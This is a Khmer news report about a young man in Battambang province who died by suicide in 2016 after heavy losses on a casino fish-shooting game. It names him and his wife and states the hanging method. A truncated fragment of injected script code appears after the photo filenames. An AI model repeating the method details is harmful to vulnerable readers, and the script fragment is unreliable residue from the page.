ល្បែងហ្គេមបាញ់ត្រី បាញ់យកជីវិតបុរសម្នាក់បណ្តាលអោយស្លាប់​ ​នេះឬគោលនយោបាយភូមិឃុំមានសុវត្ថិភាពរបស់អាជ្ញាធរ

 

បាត់ដំបង៖ បញ្ចប់ជីវិតខ្លួនឯងដោយការចង ក ព្រោះតែខូចចិត្តបំផ្លាញអស់ទ្រព្យសម្បត្តិជាច្រើនតាមរយះការលង់លក់ប្រព្រឹត្តល្បែងស៊ីសងហ្គេមបាញ់ត្រីក្នុងកាស៊ីណូឃ្វីនស្ថិតនៅស្រុកកំរៀង ខេត្តបាត់ដំបង ។

 

ប្រភពពត៌មានជុំវិញកន្លែងកើតហេតុបានអោយដឹងថា ហេតុការណ៍ខាងបានកើតឡើងនៅវេលាម៉ោង៣និង៣០នាទីទៀបភ្លឺ ឈានចូលថ្ងៃទី១៩ ខែមិថុនា ឆ្នាំ២០១៦នៅក្នុងចំនុចក្រុមទី៥ ភូមិស្វាយ ឃុំបឹងរាំង ស្រុកកំរៀង ខេត្តបាត់ដំបង។

 

ជនរងគ្រោះមានឈ្មោះ វេត វណ្ណះ អាយុ២៤ឆ្នាំ និងប្រពន្ធឈ្មោះថន រស្មី អាយុ២៣ឆ្នាំ រស់នៅភូមិគោកឃ្មុំ ឃុំតាមុឺន ស្រុកថ្មគោល ខេត្តបាត់ដំបង ទាំងពីរបានមកជួលផ្ទះនៅលើទីតាំងកន្លែងកើតហេតុដើម្បីលក់ដូរសុីមកាត នៅក្នុងផ្សារបានឡែម ប្រទេសថៃយ៉ាងសមប្រកប នៅថ្ងៃ១បានបែកគំនិតចូលលែងល្បែងហ្គែមបាញ់ត្រីក្នុងកាស៊ីណូឃ្វីនជាការផ្សងរកលាភធំ ប៉ុន្តែការបែកគំនិតនេះជាបន្តរបន្ទាប់ត្រូវផុងខ្លួនចាញ់អស់ទាំងលុយ ទាំងម៉ូតូរហូតចំនួន០៦គ្រឿង ហើយក៍តូចចិត្តស្តាយក្រោយអាណិតប្រពន្ធកូនគិតខ្លីធ្វើអត្តឃាតសម្លាប់ខ្លួនឯងតែម្តងដោយចង ក ទៅធ្នឹមផ្ទះជួល។

 

ស្ត្រីជាប្រពន្ធឈ្មោះថន រស្មី បានអោយ ដឹងថាៈ ទោះជាប្តីញៀនល្បែងលេងបំផ្លាញអស់លុយនិងអស់ម៉ូតូជាច្រើនក៌ខ្លួនមិនដែលស្តីបន្ទោសអោយប្តីធ្ងន់ធ្ងរឡើយ នៅថ្ងៃកើតហេតុទី១៩ ខែមិថុនា ប្រហែលម៉ោងជិត៣ទៀបភ្លឺខ្លួនបានទូរស័ព្ទមកប្តី ឯលោកប្តីបានពោលពាក្យថា ប្តីខុសហើយ កែរខ្លួនលែងបានហើយអូនយកប្តីទៀតចុះ ព្រោះប្តីបំផ្លាញអូនអស់ច្រើនណាស់ ហើយនាងជាប្រពន្ធបានឆ្លើយតបដោយការលួងលោមថា ឯងកុំគិតច្រើន ប្រាក់យើងអាចរកបានទៀត ភ្លាមនោះប្តីក៍បានបិទទូរសព្ទ័តែម្តង ជាអកុសលរហូតដល់វេលាម៉ោងជាង៣ទៀបភ្លឺ ក៍ទទួលបានដំណឹងថា ប្តីចងករសំលាប់ខ្លួនចាត់ទៅហើយ។

 

បន្ទាប់ពីកើតហេតុកម្លាំងនគរបាលបានចុះដល់កន្លែងកើតហេតុហើយពិនិត្យធ្វើកោសល្យវិច្ចយ័សន្និដ្ធានថា ជនរង គ្រោះពិតជាចងករពិតប្រាកដមែនហើយក៍បានប្រគល់សាកសពជនរងគ្រោះទៅអោយគ្រួសារសាច់ញាតិយកទៅធ្វើបុណ្យតាមប្រពៃណី៕

IMG-20160621-WA0050-1 IMG-20160621-WA0049var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More